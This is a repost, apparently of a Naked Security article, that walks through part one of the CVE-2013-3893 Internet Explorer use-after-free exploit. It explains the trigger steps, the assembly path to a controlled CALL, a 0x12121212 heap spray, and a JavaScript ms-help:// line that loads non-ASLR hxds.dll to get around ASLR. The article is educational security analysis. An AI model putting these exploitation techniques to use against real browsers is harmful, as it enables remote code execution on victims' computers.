10,000 more items entitled "3333....3333" will be created. [5] Call setCapture() from the child item. [6] Call setCapture() from the parent (thus causing the onclosecapture from [4] to be called in the child item). What it does Here's what you see if you run the trigger code that does this under a debugger, using Windows 7 with Internet Explorer 9: If you aren't familiar with debuggers, this window tells you that the program has crashed at the address 0x6AA33859 in the system library MSHTML.DLL, trying to run the instruction: MOV EDX,DS:[ECX] (In Intel assember notation, data flows from right to left, so this means "move the value of [ECX] into the register EDX". And the square brackets mean "fetch the value at the memory address stored in ECX, not the value of ECX itself." The DS: just denotes that the value comes from the processor's data segment.) To explain further, the code at and after the offending instruction above does the following: MOV EDX,[ECX] ; Fetch the contents of the ; memory address in ECX, ; where ECX is controlled ; by the string in [1] and [4] ; on the attacker's web page. MOV EAX,[EDX+C4] ; Fetch the contents of the ; address C4 bytes past that. CALL EAX ; And call it as a subroutine. The exception occurs because ECX = 0x33333333 (the ASCII code for the text string "3333"), but there is no memory allocated at that address for the processor to read. It looks as though memory that was freed up in [2] was then re-used by Internet Explorer to store data that controls the flow of execution in MSHTML.DLL (Microsoft's rendering engine), and then wrongly re-used against for saving the text strings created in [4]. That's a use after free bug, and in this case, it means our attackers can lead Internet Explorer astray: they can trick the browser into using untrusted data from their remote web page to tell your computer where to jump next in memory. That means there is very likely to be a chance for RCE, or Remote Code Execution. The next step To make further headway, the attackers needed to to force ECX to contain the address of memory that is allocated, and that they can influence. Adding a step [4.5] to the list above does the trick: [4.5] Create 320 text strings that take up 1MB each, containing the bytes 0x12121212 repeated over and over. This is known as a heap spray, and it's an operation that uses JavaScript's powerful string-handling functions to force the operating system to allocate large blocks of memory in a controlled way. If we run Internet Explorer again until it crashes, and then peek at the memory blocks allocated by Windows, we can see the results of the heap spray. The size column shows that these blocks are all 0x00100000 bytes in length, or 1MB: Each of those blocks is crammed with the bytes 0x1212....1212. Notice particularly - and we shall soon see why this is terribly convenient - that the memory block containing the address 0x12121212 (and the address 0x121212D6, which is 0xC4 bytes further on), is one of the chunks filled with 0x1212....1212. Finding the right size for each heap spray object, and the right number of memory allocations to perform in order to get a neat and exploitable result, doesn't need to be done analytically. Cybercriminals can save time and effort simply by using trial and error - a process that can be automated. So, instead of using the text string "3333", as in steps [1] and [4] above, our attackers can choose a value that corresponds to an address inside one of the blocks they know their heap spray will produce. In the published exploit, they chose 0x12121202, though many others would have done just as well, so that steps [1] and [4] no longer have ECX set to "3333". Instead, ECX becomes 0x12121202, and the crooks get this: ; EDX gets the contents of 12121202 MOV EDX,[12121202] ; EDX is now 12121212, so ; EAX gets the contents of EDX+C4 (121212D6) MOV EAX, [12121212+C4] ; EAX is now 12121212, which we call CALL 12121212 ; Execution is now at an address we control! On versions of Windows before XP SP3, the attackers would already have won the battle at this point, by adapting the text strings from [4.5] so that they contained shellcode (executable code hidden in chunks of data) starting at 0x12121212 , thus instantly getting control. But these days (and we're on Windows 7 in this article, remember), memory blocks dished out by the operating system - allocations "on the heap", as they are known - are set to be NX, or No Execute, by default. If you try to execute an instruction in a memory page marked NX, the processor steps in and stops you. This is the basis of DEP, or Data Execution Prevention, and it means that even though our attackers can control exactly what is at address 0x12121212, and divert the processor to it, they can't make it run: On Windows XP, DEP slows the attackers down a bit, but not much: all they need to do is to tweak the heap spray so that the value at 0x121212D6 is an address in executable memory. (0x121212D6, remember, is 0x12121212+0xC4: that's where the CPU will jump as a side-effect of triggering this bug, due to the CALL EAX instruction shown above.) The richest sources of ready-to-use executable memory are the numerous system DLLs that are almost always loaded, such as KERNEL32.DLL, USER32.DLL and GDI32.DLL. Getting around ASLR On Windows 7, however, picking addresses in system DLLs is much harder than it sounds, because of ASLR, or Address Space Layout Randomisation. For example, here's a table from our test computer, showing where Internet Explorer and its first few DLLs are supposed to load, and where they actually loaded on three successive reboots: In short: DEP stops attackers with a vulnerability like this one from jumping straight to their shellcode as soon as the exploit gets control. ASLR stops attackers from bypassing DEP by jumping into a system DLL, because they don't know where it will be in memory. ? On Windows XP, system DLLs load at the same place every time, on every computer, making XP much easier to hack. That alone is enough reason to ditch XP as soon as you can, regardless of the looming "no more patches" deadline of April 2014. But our attackers have a way around this, because some common and popular DLLs still advertise themselves as incompatible with ASLR, and are therefore loaded without it. So they added this line of JavaScript for attacking Windows 7 users: try{location.href='ms-help://'} catch(e){} If you have Office 2007 or Office 2010 installed, trying to open an ms-help:// URL causes Internet Explorer to load the support library hxds.dll: Sadly, the address 0x51BD0000 is exactly where this DLL always loads, because it was compiled by Microsoft without the so-called DYNAMICBASE option, thus causing it to be left out of ASLR: Admittedly, this restricts the attackers to infecting computers on which Office is installed - but in practice, that isn't a major limitation: even if you don't own Office, you may well have a demo version left over from when you bought your PC. At this point, our attackers are on the brink of controlling your computer, having evaded all of the following: Windows memory management. JavaScript's "sandbox". Data Execution Prevention. Address Space Layout Randomisation. The good news is that they still have a fair amount of work to do. Before they can go any further, for example, they need to choose which address in hxds.dll they will write at offset 0x121212D6, to be the target of the fateful CALL EAX that will give them their first unlawfully executed machine code instruction. The bad news, of course, is we already know that our crooks are going to succeed in the end. So, please join us next week for Part Two, where we'll show you what they are going to do next, and why, and how you can detect and prevent their nefarious activities. Sursa: Anatomy of an exploit – inside the CVE-2013-3893 Internet Explorer zero-day – Part 1 | Naked Security